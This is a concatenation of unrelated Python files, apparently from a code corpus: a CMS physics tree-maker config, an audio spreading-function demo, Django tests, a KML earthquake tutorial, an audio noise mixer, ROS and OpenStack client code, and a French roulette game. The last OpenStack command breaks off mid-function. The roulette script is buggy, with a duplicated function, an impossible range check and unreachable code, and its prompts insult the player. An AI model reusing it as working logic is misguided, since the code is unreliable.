"MC_hadW_E",
"MC_hadWs1_pt",
"MC_hadWs1_eta",
"MC_hadWs1_phi",
"MC_hadWs1_E",
"MC_hadWs2_pt",
"MC_hadWs2_eta",
"MC_hadWs2_phi",
"MC_hadWs2_E",
"MC_hadb_pt",
"MC_hadb_eta",
"MC_hadb_phi",
"MC_hadb_E",
"MC_cstar",
"MC_x_F",
"MC_Mtt",
"evt_XSec",
"evt_Gen_Weight",
"evt_Gen_Ht",
"evt_top_pt_rw_v1",
"SUSY_Stop_Mass",
"SUSY_Gluino_Mass",
"SUSY_LSP_Mass",
),
vectorI = cms.untracked.vstring(
#"gen_ID",
#"gen_Status",
#"gen_Mom0ID",
#"gen_Mom0Status",
#"gen_Mom1ID",
#"gen_Mom1Status",
#"gen_Dau0ID",
#"gen_Dau0Status",
#"gen_Dau1ID",
#"gen_Dau1Status",
#AK8_prefix+"_HasNearGenTop",
#AK8_prefix+"_NearGenTopIsHadronic",
#AK8_prefix+"_NearGenWIsHadronic",
#AK8_prefix+"_NearGenWToENu",
#AK8_prefix+"_NearGenWToMuNu",
#AK8_prefix+"_NearGenWToTauNu",
#AK4_prefix+"_looseJetID",
#AK4_prefix+"_tightJetID",
#AK4_prefix+"_tightLepVetoJetID",
#AK8_prefix+"_looseJetID",
#AK8_prefix+"_tightJetID",
#AK8_prefix+"_tightLepVetoJetID",
#AK8sub_prefix+"_looseJetID",
#AK8sub_prefix+"_tightJetID",
#AK8sub_prefix+"_tightLepVetoJetID",
#"el_IsPartOfNearAK4Jet",
#"el_IsPartOfNearAK8Jet",
#"el_IsPartOfNearSubjet",
#"mu_IsPartOfNearAK4Jet",
#"mu_IsPartOfNearAK8Jet",
#"mu_IsPartOfNearSubjet",
#"el_mvaIDvalueHZZ",
"el_IDVeto_NoIso",
"el_IDLoose_NoIso",
"el_IDMedium_NoIso",
"el_IDTight_NoIso",
"el_IsoVeto",
"el_IsoLoose",
"el_IsoMedium",
"el_IsoTight",
"el_IDVeto",
"el_IDLoose",
"el_IDMedium",
"el_IDTight",
),
vectorF = cms.untracked.vstring(
"scale_Weights",
"pdf_Weights",
"alphas_Weights",
"metsyst_MuCleanOnly_Pt",
"metsyst_MuCleanOnly_Phi",
"metsyst_Pt",
"metsyst_Phi",
#"puppimetsyst_Pt",
#"puppimetsyst_Phi",
#"gen_Pt",
#"gen_Eta",
#"gen_Phi",
#"gen_E",
#"gen_Mass",
#"gen_Charge",
#AK8_prefix+"_maxSubjetCSVv2",
#AK8_prefix+"_maxSubjetCMVAv2",
#AK8_prefix+"_DRNearGenTop",
#AK8_prefix+"_DRNearGenWFromTop",
#AK8_prefix+"_DRNearGenBFromTop",
#AK8_prefix+"_DRNearGenLepFromSLTop",
#AK8_prefix+"_DRNearGenNuFromSLTop",
#AK8_prefix+"_PtNearGenTop",
#AK8_prefix+"_PtNearGenBFromTop",
#AK8_prefix+"_PtNearGenWFromTop",
#AK8_prefix+"_PtNearGenLepFromSLTop",
#AK8_prefix+"_PtNearGenNuFromSLTop",
#AK8_prefix+"_softDropMassPuppiUncorr",
#AK8_prefix+"_softDropMassPuppiCorr",
#"el_DRNearGenEleFromSLTop",
#"el_PtNearGenEleFromSLTop",
#"el_PtNearGenTop",
#"el_LepAK4JetFrac",
#"el_LepAK8JetFrac",
#"el_LepSubjetFrac",
#"el_LepAK4JetMassDrop",
#"el_LepAK8JetMassDrop",
#"el_LepSubjetMassDrop",
#"el_AK4JetV1DR",
#"el_AK4JetV2DR",
#"el_AK4JetV3DR",
#"el_AK8JetV1DR",
#"el_AK8JetV2DR",
#"el_AK8JetV3DR",
#"el_SubjetV1DR",
#"el_SubjetV2DR",
#"el_SubjetV3DR",
#"el_AK4JetV1PtRel",
#"el_AK4JetV2PtRel",
#"el_AK4JetV3PtRel",
#"el_AK8JetV1PtRel",
#"el_AK8JetV2PtRel",
#"el_AK8JetV3PtRel",
#"el_SubjetV1PtRel",
#"el_SubjetV2PtRel",
#"el_SubjetV3PtRel",
#"mu_DRNearGenMuFromSLTop",
#"mu_PtNearGenMuFromSLTop",
#"mu_PtNearGenTop",
#"mu_LepAK4JetFrac",
#"mu_LepAK8JetFrac",
#"mu_LepSubjetFrac",
#"mu_LepAK4JetMassDrop",
#"mu_LepAK8JetMassDrop",
#"mu_LepSubjetMassDrop",
#"mu_AK4JetV1DR",
#"mu_AK4JetV2DR",
#"mu_AK4JetV3DR",
#"mu_AK8JetV1DR",
#"mu_AK8JetV2DR",
#"mu_AK8JetV3DR",
#"mu_SubjetV1DR",
#"mu_SubjetV2DR",
#"mu_SubjetV3DR",
#"mu_AK4JetV1PtRel",
#"mu_AK4JetV2PtRel",
#"mu_AK4JetV3PtRel",
#"mu_AK8JetV1PtRel",
#"mu_AK8JetV2PtRel",
#"mu_AK8JetV3PtRel",
#"mu_SubjetV1PtRel",
#"mu_SubjetV2PtRel",
#"mu_SubjetV3PtRel",
),
)
### Filter - Selects events with at least one muon with pt>25, |eta|<3.0
process.MuonCountFilter = cms.EDFilter("PatMuonCountFilter",
filter = cms.bool(True),
src = cms.InputTag("slimmedMuons"),
cut = cms.string("pt>25. && abs(eta)<3.0"),
minNumber = cms.uint32(1)
)
### Filter - Selects events with at least one electron with pt>25, |eta|<3.0
process.ElectronCountFilter = cms.EDFilter("PatElectronCountFilter",
filter = cms.bool(True),
src = cms.InputTag("slimmedElectrons"),
cut = cms.string("pt>25. && abs(eta)<3.0"),
minNumber = cms.uint32(1)
)
### Filter - Select only events with at least 4 AK4 jets with pt>20 and |eta|<3.0
process.AK4JetCountFilter = cms.EDFilter("PatJetCountFilter",
filter = cms.bool(True),
src = cms.InputTag("slimmedJets"),
cut = cms.string("pt>20. && abs(eta)<3.0"),
minNumber = cms.uint32(4)
)
### Filter - Select only events with at least 1 AK8 jet with pt>175 and |eta|<3.0
process.AK8JetCountFilter = cms.EDFilter("PatJetCountFilter",
filter = cms.bool(True),
src = cms.InputTag("slimmedJetsAK8"),
cut = cms.string("pt>175. && abs(eta)<3.0"),
minNumber = cms.uint32(1)
)
if genHtFilter:
process.GenHtFilter = cms.EDFilter("SingleFloatFilter",
src = cms.InputTag("extraVar","evtGenHt"),
max = cms.untracked.double(600),
)
### B2GTTreeMaker
process.load("Analysis.B2GTTrees.B2GTTreeMaker_cff")
# Adding extra Variables
process.B2GTTreeMaker.physicsObjects.append(
cms.PSet(
label = cms.untracked.string("extraVar"),
prefix_in = cms.untracked.string(""),
prefix_out = cms.untracked.string(""),
singleI = process.extraVar.singleI,
singleF = process.extraVar.singleF,
vectorI = process.extraVar.vectorI,
vectorF = process.extraVar.vectorF,
)
)
process.B2GTTreeMaker.isData = isData
### EventCounter - to be applied before any filter to count
# negative and positive weight events (for NLO samples)
# histo name: NEventNoFilter (bin 1: neg, bin 2: pos weighted events)
process.EventCounter = cms.EDAnalyzer("EventCounter",
isData = cms.untracked.bool(isData)
)
# Paths
process.analysisPathBoostedMuons = cms.Path(
process.extraVar *
process.EventCounter *
process.MuonCountFilter * #muon filter
process.AK8JetCountFilter * #boosted AK8 jet filter
process.B2GTTreeMaker)
process.analysisPathBoostedElectrons = cms.Path(
process.extraVar *
process.EventCounter *
process.ElectronCountFilter * #electron filter
process.AK8JetCountFilter * #boosted AK8 jet filter
process.B2GTTreeMaker)
process.analysisPathResolvedMuons = cms.Path(
process.extraVar *
process.EventCounter *
process.MuonCountFilter * #muon filter
process.AK4JetCountFilter * #resolved AK4 jet filter
process.B2GTTreeMaker)
process.analysisPathResolvedElectrons = cms.Path(
process.extraVar *
process.EventCounter *
process.ElectronCountFilter * #electron filter
process.AK4JetCountFilter * #resolved AK4 jet filter
process.B2GTTreeMaker)
|
# coding: utf-8
# ## Example
# * This Python example shows the non-linear superposition with parameter **$2*a=alpha=0.6$, in the Bark scale**. We construct a matrix which does the actual superposition in the Bark domain, because that is most efficient:
# In[1]:
import numpy as np
def spreadingfunctionmat(maxfreq,nfilts,alpha):
#Arguments: maxfreq: half the sampling frequency
#nfilts: Number of subbands in the Bark domain, for instance 64
fadB= 14.5+12 # Simultaneous masking for tones at Bark band 12
fbdb=7.5 # Upper slope of spreading function
fbbdb=26.0 # Lower slope of spreading function
maxbark=hz2bark(maxfreq)
spreadingfunctionBarkdB=np.zeros(2*nfilts)
#upper slope, fbdB attenuation per Bark, over maxbark Bark (full frequency range), with fadB dB simultaneous masking:
spreadingfunctionBarkdB[0:nfilts]=np.linspace(-maxbark*fbdb,-2.5,nfilts)-fadB
#lower slope fbbdb attenuation per Bark, over maxbark Bark (full frequency range):
spreadingfunctionBarkdB[nfilts:2*nfilts]=np.linspace(0,-maxbark*fbbdb,nfilts)-fadB
#Convert from dB to "voltage" and include alpha exponent
spreadingfunctionBarkVoltage=10.0**(spreadingfunctionBarkdB/20.0*alpha)
#Spreading functions for all bark scale bands in a matrix:
spreadingfuncmatrix=np.zeros((nfilts,nfilts))
for k in range(nfilts):
spreadingfuncmatrix[:,k]=spreadingfunctionBarkVoltage[(nfilts-k):(2*nfilts-k)]
return spreadingfuncmatrix
# The above produces a prototype of spreading functions for all the bark bands(bark counts based on the resolution)
# Below is the psyacmodel python example
# In[2]:
get_ipython().magic(u'matplotlib inline')
from psyacmodel import *
import matplotlib.pyplot as plt
fs=32000 # sampling frequency of audio signal
maxfreq=fs/2
alpha=0.6 #Exponent for non-linear superposition of spreading functions
nfilts=64 #number of subbands in the bark domain
spreadingfuncmatrix=spreadingfunctionmat(maxfreq,nfilts,alpha)
plt.imshow(spreadingfuncmatrix)
plt.title('Matrix spreadingfuncmatrix as Image')
plt.xlabel('Bark Domain Subbands')
plt.ylabel('Bark Domain Subbands')
plt.show()
|
#-*-coding:utf-8 -*
import random
import math
# from random import randrange
def verifier_chiffre_correct(question):
while True:
try:
le_biff = int(raw_input(question))
print("TOTO")
except:
print("La valeur n'est pas correcte")
print(le_biff)
if le_biff <= 0:
print("La valeur n'est pas correcte")
else:
print("TA MAMAN")
return le_biff
def verifier_chiffre_correct(question):
while True:
try:
choix = int(raw_input(question))
except:
print("La valeur n'est pas correcte")
#pass
else:
if choix <= 0 and choix >=50:
print("La valeur n'est pas correcte")
continue
return choix
le_biff=verifier_chiffre_correct("Combien d'argent voulez-vous apporter à la table :")
print("Votre cagnotte est actuellement de ", le_biff)
choix=verifier_chiffre_correct("Veuillez faire votre choix entre les chiffres 0 et 49 :")
if choix % 2 == 0:
print("vous avez choisis le chiffre RED ", choix)
else:
print("vous avez choisis le chiffre BLACK ", choix)
exit()
choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
while choix<0 or choix>49:
print("T es con ou tu fais expres ? Je sais pas comment on code autrement, alors fais pas le malin !")
choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
mise = input("Combien désirez vous miser : ")
if mise < 20:
print("Et baaaah alors ?? On aurait peur de la banque ? ")
elif mise < 20:
print("Et baaaah voila !! on a enfin compris ! ")
raw_input("Appuyez sur entree ma petite poule")
while le_biff > 0:
print("Les jeux sont faits !")
raw_input("C est le moment ou tu commences a avoir peur ? ALLEZ fais pas le fier !")
raw_input("RIEN NE VA PLUUUUUUUS")
s = random.randrange(50)
if s % 2 == 0:
print("ET LE NUMERO GAGNANT EST LE rouge :", s)
raw_input("Je parie que tu te dis que ta femme avait raison.... Me tromp-je ?")
else:
print("ET LE NUMERO GAGNANT EST LE noir :", s)
raw_input("Je parie que tu te dis que ta femme avait raison.... Me tromp-je ?")
if (s == choix):
print("VOUS AVEZ GAGNEZ ! FELICITATIONS ! vous remportez $ ", mise*3)
gain = (mise*3)
le_biff += gain #paul's rustine ?
print("Il vous reste $",le_biff)
raw_input("C EST A CE MOMENT LA QUE TU TE DIS QUE SI TU AVAIS MISER PLUS TU AURAIS PU QUITTER TA FEMME")
elif (s != choix and # Dans le cas ou ce n'est pas le meme nombre qui sort
s % 2 == 0 and
choix % 2 == 0):
print("Pairs ! Rouges ! Vous recuperez la somme de $", mise*0.5)
gain = (mise-(mise*0.5))
le_biff += gain
print("Il vous reste $", le_biff)
raw_input("Recuperez...recuperez...je vous croyais ici pour gagner")
elif(s != choix and
s % 2 != 0 and
choix % 2 != 0):
print("Impairs ! Noirs ! Vous recuperez la somme de $", mise*0.5)
gain = (mise-(mise*0.5))
le_biff += gain
print("Il vous reste $", le_biff)
raw_input("Recuperez...recuperez...je vous croyais ici pour gagner")
else :
print("Perdu ! la banque recupere la somme de $", mise)
raw_input("Si on additione cela fait quand même.... Roulements de tambours....")
gain = (-mise)
le_biff += gain
print("Il vous reste $", le_biff)
raw_input("AVEC UN PROGRAMME AUSSI NUL T ES CAPABLE DE PERDRE ? AHAHAHAHHAAHAHAHAHHAAHAHAHAHHAHAAH")
print(gain)
mise = input("Combien desirer vous miser : ")
choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
while choix<0 or choix>49:
print("Ceci n'est pas possible")
choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
mise = input("Combien desirez vous miser : ")
if mise < 20:
print("Et baaaah alors ?? On aurait peur de la banque ? ")
elif mise < 0:
print("Nan MAIS SERIEUX ????? tu me prends pour un con la ?")
elif mise > 20:
print("Et baaaah voila !! on a enfin compris ! ")
input("Appuyez sur entree ma petite poule")
# def resultat(choix):
# if (s == choix):
# print("VOUS AVEZ GAGNEZ ! FELICITATIONS ! vous remportez $ ", mise*3)
# cagnotte += (mise*3)
# print("Il vous reste $",cagnotte)
# elif (s != choix and # Dans le cas ou ce n'est pas le meme nombre qui sort
# s % 2 == 0 and
# choix % 2 == 0):
# print("Pairs ! Rouges ! Vous reécupérez la somme de $", mise*0.5)
# cagnotte += (mise*0.5)
# print("Il vous reste $",cagnotte)
# elif(s != choix and
# s % 2 != 0 and
# choix % 2 != 0):
# print("Impairs ! Noirs ! Vous récupérez la somme de $", mise*0.5)
# cagnotte += mise*0.5
# print("Il vous reste $", cagnotte)
# else :
# print("Perdu ! la banque recupère la somme de $", mise)
# cagnotte += (-mise)
# print("Il vous reste $", cagnotte)
# resultat(choix)
# Avant
|
from lettuce import *
from lxml import html
from django.test.client import Client
from nose.tools import assert_equals, assert_true
import logging
LOG_FILENAME = 'test-debug.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
@before.all
def set_browser():
world.browser = Client()
@step(r'I access the url "(.*)"')
def access_url(step, url):
response = world.browser.get(url)
if response.status_code == 200:
# Only try and generate the DOM if you actually get a valid response
world.dom = html.fromstring(response.content)
elif response.status_code == 302:
world.status_code = response.status_code
world.location = response['Location']
@step(r'I see the form "(.*)"')
def see_header(step, form_id):
form = world.dom.cssselect('#' + form_id)
assert_true(form, "There is no form with id " + form_id)
@step(r'I see the header "(.*)"')
def see_header(step, text):
header = world.dom.cssselect('h3')[0].text.strip()
assert_equals(
header,
text,
"Did not find header with content '" + text + "'"
)
@step(u'Then I am redirected to the url "(.*)"')
def then_i_am_redirected_to_the_url(step, url):
assert_equals(302, world.status_code, "Did not receive 302 redirect")
# .find returns -1 when there is no match
assert_true(world.location.find(url) >= 0,
"Was not redirected to the correct location")
|
import pytest
from guardian.shortcuts import get_perms
@pytest.mark.django_db
def test_anonymous_user_has_no_edit_perm(location, guardian_anonymous_user):
assert 'change_location' not in get_perms(guardian_anonymous_user, location)
@pytest.mark.django_db
def test_user_has_no_edit_perm(location, user):
assert 'change_location' not in get_perms(user, location)
@pytest.mark.django_db
def test_creator_gets_edit_perm(location, user):
assert location.created_by_id != user.pk
assert 'change_location' not in get_perms(user, location)
location.created_by = user
location.save()
assert 'change_location' in get_perms(user, location)
@pytest.mark.django_db
def test_multiple_saves(location, user):
# There was a bug that caused multiple saves to toggle the perm
assert 'change_location' not in get_perms(user, location)
location.created_by = user
location.save()
assert 'change_location' in get_perms(user, location)
location.save()
assert 'change_location' in get_perms(user, location)
@pytest.mark.django_db
def test_municipality_moderator_gets_edit_perm(location, user):
assert 'change_location' not in get_perms(user, location)
location.municipality.moderators.add(user)
assert 'change_location' in get_perms(user, location)
location.municipality.moderators.remove(user)
assert 'change_location' not in get_perms(user, location)
|
#Import necessary libraries
from pylibkml import Kml, Utilities
from csv import reader
from string import atof, replace
import urllib2
def process_datetime(datestr):
'''
Takes the string value and processes it into something that Google Earth
can use in its <TimeStamp>
Keyword arguments:
datestr -- (string) The DateTime string
'''
#Get rid of the extra space between the day and month
datestr = replace(datestr,' ',' ')
#Get rid of the commas
datestr = replace(datestr,',','')
#Turn the string into a list
datestr = datestr.split(' ')
#Create a list of months to search though
month = ['January','February','March','April','May','June',
'July','August','September','October','November','December']
#Find the numerical value of the month
month_index = month.index(datestr[1])+1
#Create the string for the <TimeStamp>
retstring = datestr[3]+'-'+str(month_index).zfill(2)+'-'+datestr[2].zfill(2)
return retstring+'T'+datestr[4]+'Z'
def main():
'''
A basic tutorial explaining pylibkml
Extracts from a .csv file and makes a tutorial.kml file
'''
#Code required to grab file from website and save it
url = 'http://earthquake.usgs.gov/eqcenter/catalogs/eqs7day-M1.txt'
webFile = urllib2.urlopen(url)
localFile = open(url.split('/')[-1], 'w')
localFile.write(webFile.read())
webFile.close()
localFile.close()
inputfile = reader(file(url.split('/')[-1]), delimiter=',')
inputfile.next() # Get rid of the header information
#Initialize the Data Lists
Eqid = [];DateTime = [];Lat=[];Lon=[];Mag=[];Depth=[];NST=[];Location=[]
#Cycle through the .csv file and extract all necessary data to populate
#the data lists
for line in inputfile:
Eqid.append(line[1])
DateTime.append(line[3])
Lat.append(line[4])
Lon.append(line[5])
Mag.append(line[6])
Depth.append(line[7])
NST.append(line[8])
Location.append(line[9])
#Create the placemarks with the necessary data
placemark = []
for i in range(0,len(Lat)):
#Create a <coordinate> object
coordinate = Kml().create_coordinates(atof(Lon[i]),atof(Lat[i]))
#Create a <Point> object
point = Kml().create_point({'coordinates':coordinate})
#Modify the datestring so that it works with the .kml file
datestr = process_datetime(DateTime[i])
#Create the <TimeStamp> object
timestamp = Kml().create_timestamp({'when':datestr})
#Create the <Data> objects and place them in <ExtendedData>
data = []
data.append(Kml().create_data({'name':'eqid','value':Eqid[i]}))
data.append(Kml().create_data({'name':'datetime','value':DateTime[i]}))
data.append(Kml().create_data({'name':'lat','value':Lat[i]}))
data.append(Kml().create_data({'name':'lon','value':Lon[i]}))
data.append(Kml().create_data({'name':'mag','value':Mag[i]}))
data.append(Kml().create_data({'name':'depth','value':Depth[i]}))
data.append(Kml().create_data({'name':'nst','value':NST[i]}))
data.append(Kml().create_data({'name':'location','value':Location[i]}))
extendeddata = Kml().create_extendeddata({'data':data})
#Create the <Placemark> object
placemark.append(Kml().create_placemark({'name':Eqid[i],
'point':point,
'timestamp':timestamp,
'extendeddata':extendeddata,
'styleurl':'#primary-style'}))
#Create the <Icon> object for the <IconStyle>
icon_href = 'http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png'
iconstyleicon = Kml().create_iconstyleicon({'href': icon_href})
#Create the <IconStyle> object
iconstyle = Kml().create_iconstyle({'color':'ff0400ff',
'scale' : 1.2,
'colormode': 'normal',
'icon':iconstyleicon})
#Create the <BalloonStyle> object
balloon_txt = '<![CDATA[<BODY bgcolor="ff0004">\n<h3>USGS Earthquake Data'+\
'<TABLE BORDER=1>\n'+\
'<tr><td><b>Earthquake ID</b></td><td>$[eqid]</td></tr>\n'+\
'<tr><td><b>Date/Time</b></td><td>$[datetime]</td></tr>\n'+\
'<tr><td><b>Latitude,Longitude</b></td><td>$[lat],$[lon]</td></tr>\n'+\
'<tr><td><b>Magnitude</b></td><td>$[mag]</td></tr>\n'+\
'<tr><td><b>Depth</b></td><td>$[depth]</td></tr>\n'+\
'<tr><td><b>NST</b></td><td>$[nst]</td></tr>\n'+\
'<tr><td><b>Location</b></td><td>$[location]</td></tr>\n'+\
'</TABLE>\n</BODY>\n]]>'
balloonstyle = Kml().create_balloonstyle({'text':balloon_txt,
'bgcolor':'ff0400ff'})
#Create the <Style> object with <IconStyle> and <BalloonStyle>
style = []
style.append(Kml().create_style({'id':'primary-style',
'balloonstyle':balloonstyle,
'iconstyle':iconstyle}))
#Put the Placemarks in a <Folder> object
folder = []
folder.append(Kml().create_folder({'name':'USGS Earthquakes',
'placemark':placemark}))
#Demonstrating a Doughnut shaped Polygon
coord_out = [(-122.366278,37.818844,30),
(-122.365248,37.819267,30),
(-122.365640,37.819861,30),
(-122.366669,37.819429,30),
(-122.366278,37.818844,30)]
coord_out = Kml().create_coordinates(coord_out)
outer_ring = Kml().create_linearring({'coordinates':coord_out})
outerboundary = Kml().create_outerboundaryis({'linearring':outer_ring})
coord_in = [(-122.366212,37.818977,30),
(-122.365424,37.819294,30),
(-122.365704,37.819731,30),
(-122.366488,37.819402,30),
(-122.366212,37.818977,30)]
coord_in = Kml().create_coordinates(coord_in)
inner_ring = Kml().create_linearring({'coordinates':coord_in})
innerboundary = Kml().create_innerboundaryis({'linearring':inner_ring})
polygon = Kml().create_polygon({'extrude':1,
'altitudemode':'relativetoground',
'innerboundaryis':innerboundary,
'outerboundaryis':outerboundary})
placemark = Kml().create_placemark({'name':'Sample Doughnut Polygon',
'polygon':polygon,
'styleurl':'#poly-style'})
folder.append(Kml().create_folder({'name':'Sample Polygons',
'placemark':placemark}))
#<Style> for the <Polygon> demonstration
polystyle = Kml().create_polystyle({'color':'ffff0000',
'fill':1,
'outline':1})
style.append(Kml().create_style({'id':'poly-style',
'polystyle':polystyle}))
#Put everything in a <Document> object
document = Kml().create_document({'folder':folder,
'style':style})
#Create the final <Kml> object
kml = Kml().create_kml({'document':document})
#Write the Kml object to tutorial.kml
toFile = open('tutorial.kml','w')
toFile.write(Utilities().SerializePretty(kml))
toFile.close()
if __name__ == '__main__':
main()
|
import os
import io_function as iof
import signal_processing as sp
input_file_dir = 'C:/Users/유정찬/Desktop/test/clean_test'
noise_file_dir = 'C:/Users/유정찬/Desktop/test/noise'
output_file_dir = 'C:/Users/유정찬/Desktop/test/noisy_test'
snr_or_ssnr = 'ssnr'
target_dB = 10
frame_size = 1600
# check input, noise directory
input_is_dir = os.path.isdir(input_file_dir)
noise_is_dir = os.path.isdir(noise_file_dir)
if input_is_dir:
input_file_list = iof.read_dir_list(input_file_dir, extention='wav')
else:
input_file_list = [input_file_dir]
if noise_is_dir:
noise_file_list = iof.read_dir_list(noise_file_dir, extention='wav')
else:
noise_file_list = [noise_file_dir]
if len(input_file_list)==0:
raise Exception("ERROR: Input file is not exist")
if len(noise_file_list)==0:
raise Exception("ERROR: Noise file is not exist")
# make noise set
old_sample_rate = 0
temp_sample_rate = 0
noise_signal_train = []
print('Processing noise file.')
i = 0
for wav_file in noise_file_list:
i += 1
print('Processing({}) {}/{} ...'.format(wav_file, i, len(noise_file_list)))
temp_noise_signal, temp_sample_rate = iof.read_wav(wav_file)
if old_sample_rate != 0 and old_sample_rate != temp_sample_rate:
raise Exception("ERROR: Different sample rate is exist.")
else:
old_sample_rate = temp_sample_rate
temp_noise_signal = sp.change_power(temp_noise_signal, 1)
noise_signal_train.extend(temp_noise_signal)
# mix noise
old_sample_rate = 0
temp_sample_rate = 0
noise_start_point = 0
print('Generate noisy file.')
i = 0
for wav_file in input_file_list:
i += 1
print('Processing({}) {}/{} ...'.format(wav_file, i, len(input_file_list)))
temp_input_signal, temp_sample_rate = iof.read_wav(wav_file)
if old_sample_rate != 0 and old_sample_rate != temp_sample_rate:
raise Exception("ERROR: Different sample rate is exist.")
else:
old_sample_rate = temp_sample_rate
temp_noise_signal = []
left_size = len(temp_input_signal)
while left_size > 0:
available_length = len(noise_signal_train)-noise_start_point
available_length = min(available_length, left_size)
temp_noise_signal.extend(noise_signal_train[noise_start_point:noise_start_point+available_length])
left_size -= available_length
noise_start_point += available_length
if noise_start_point == len(noise_signal_train):
noise_start_point = 0
mixed_signal = sp.mix_noise(temp_input_signal, temp_noise_signal, target_dB, snr_or_ssnr, frame_size)
temp_output_file_dir = wav_file.replace(input_file_dir, output_file_dir)
iof.create_folder(os.path.dirname(temp_output_file_dir))
iof.write_wav(mixed_signal, temp_output_file_dir, temp_sample_rate)
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the LogInfo action."""
from typing import List
import launch.logging
from ..action import Action
from ..frontend import Entity
from ..frontend import expose_action
from ..frontend import Parser # noqa: F401
from ..launch_context import LaunchContext
from ..some_substitutions_type import SomeSubstitutionsType
from ..substitution import Substitution
from ..utilities import normalize_to_list_of_substitutions
@expose_action('log')
class LogInfo(Action):
"""Action that logs a message when executed."""
def __init__(self, *, msg: SomeSubstitutionsType, **kwargs):
"""Create a LogInfo action."""
super().__init__(**kwargs)
self.__msg = normalize_to_list_of_substitutions(msg)
self.__logger = launch.logging.get_logger('launch.user')
@classmethod
def parse(
cls,
entity: Entity,
parser: 'Parser'
):
"""Parse `log` tag."""
_, kwargs = super().parse(entity, parser)
kwargs['msg'] = parser.parse_substitution(entity.get_attr('message'))
return cls, kwargs
@property
def msg(self) -> List[Substitution]:
"""Getter for self.__msg."""
return self.__msg
def execute(self, context: LaunchContext) -> None:
"""Execute the action."""
self.__logger.info(
''.join([context.perform_substitution(sub) for sub in self.msg])
)
return None
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Endpoint Group action implementations"""
import json
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common
LOG = logging.getLogger(__name__)
class _FiltersReader(object):
_description = _("Helper class capable of reading filters from files")
def _read_filters(self, path):
"""Read and parse rules from path
Expect the file to contain a valid JSON structure.
:param path: path to the file
:return: loaded and valid dictionary with filters
:raises exception.CommandError: In case the file cannot be
accessed or the content is not a valid JSON.
Example of the content of the file:
{
"interface": "admin",
"service_id": "1b501a"
}
"""
blob = utils.read_blob_file_contents(path)
try:
rules = json.loads(blob)
except ValueError as e:
msg = _(
"An error occurred when reading filters from file "
"%(path)s: %(error)s"
) % {"path": path, "error": e}
raise exceptions.CommandError(msg)
else:
return rules
class AddProjectToEndpointGroup(command.Command):
_description = _("Add a project to an endpoint group")
def get_parser(self, prog_name):
parser = super(AddProjectToEndpointGroup, self).get_parser(prog_name)
parser.add_argument(
'endpointgroup',
metavar='<endpoint-group>',
help=_('Endpoint group (name or ID)'),
)
parser.add_argument(
'project',
metavar='<project>',
help=_('Project to associate (name or ID)'),
)
common.add_project_domain_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.identity
endpointgroup = utils.find_resource(
client.endpoint_groups, parsed_args.endpointgroup
)
project = common.find_project(
client, parsed_args.project, parsed_args.project_domain
)
client.endpoint_filter.add_endpoint_group_to_project(
endpoint_group=endpointgroup.id, project=project.id
)
class CreateEndpointGroup(command.ShowOne, _FiltersReader):
_description = _("Create new endpoint group")
def get_parser(self, prog_name):
parser = super(CreateEndpointGroup, self).get_parser(prog_name)
parser.add_argument(
'name',
metavar='<name>',
help=_('Name of the endpoint group'),
)
parser.add_argument(
'filters',
metavar='<filename>',
help=_('Filename that contains a new set of filters'),
)
parser.add_argument(
'--description',
help=_('Description of the endpoint group'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
filters = None
if parsed_args.filters:
filters = self._read_filters(parsed_args.filters)
endpoint_group = identity_client.endpoint_groups.create(
name=parsed_args.name,
filters=filters,
description=parsed_args.description,
)
info = {}
endpoint_group._info.pop('links')
info.update(endpoint_group._info)
return zip(*sorted(info.items()))
class DeleteEndpointGroup(command.Command):
_description = _("Delete endpoint group(s)")
def get_parser(self, prog_name):
parser = super(DeleteEndpointGroup, self).get_parser(prog_name)
parser.add_argument(
'endpointgroup',
metavar='<endpoint-group>',
nargs='+',
help=_('Endpoint group(s) to delete (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
result = 0
for i in parsed_args.endpointgroup:
try:
endpoint_id = utils.find_resource(
identity_client.endpoint_groups, i
).id
identity_client.endpoint_groups.delete(endpoint_id)
except Exception as e:
result += 1
LOG.error(
_(
"Failed to delete endpoint group with "
"ID '%(endpointgroup)s': %(e)s"
),
{'endpointgroup': i, 'e': e},
)
if result > 0:
total = len(parsed_args.endpointgroup)
msg = _(
"%(result)s of %(total)s endpointgroups failed " "to delete."
) % {'result': result, 'total': total}
raise exceptions.CommandError(msg)
class ListEndpointGroup(command.Lister):
_description = _("List endpoint groups")
def get_parser(self, prog_name):
parser = super(ListEndpointGroup, self).get_parser(prog_name)
list_group = parser.add_mutually_exclusive_group()
list_group.add_argument(
'--endpointgroup',
metavar='<endpoint-group>',
help=_('Endpoint Group (name or ID)'),
)
list_group.add_argument(
'--project',
metavar='<project>',
help=_('Project (name or ID)'),
)
parser.add_argument(
'--domain',
metavar='<domain>',
help=_('Domain owning <project> (name or ID)'),
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.identity
endpointgroup = None
if parsed_args.endpointgroup:
endpointgroup = utils.find_resource(
client.endpoint_groups, parsed_args.endpointgroup
)
project = None
if parsed_args.project:
project = common.find_project(
client, parsed_args.project, parsed_args.domain
)
if endpointgroup:
